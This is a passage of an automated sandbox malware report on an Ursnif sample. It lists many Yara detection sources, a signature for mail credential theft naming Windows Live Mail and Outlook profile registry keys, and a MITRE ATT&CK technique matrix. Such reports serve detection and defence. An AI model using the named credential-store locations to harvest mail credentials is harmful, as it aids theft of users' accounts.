                      Source: Yara matchFile source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1Windows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                      Default AccountsNative API1Valid Accounts1Valid Accounts1DLL Side-Loading1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection11Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Access Token Manipulation1Rootkit4Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsPowerShell1Logon Script (Mac)Process Injection913Masquerading1NTDSSystem Information Discovery46Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptValid Accounts1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsSecurity Software Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection913Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingSystem Network Configuration Discovery2Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
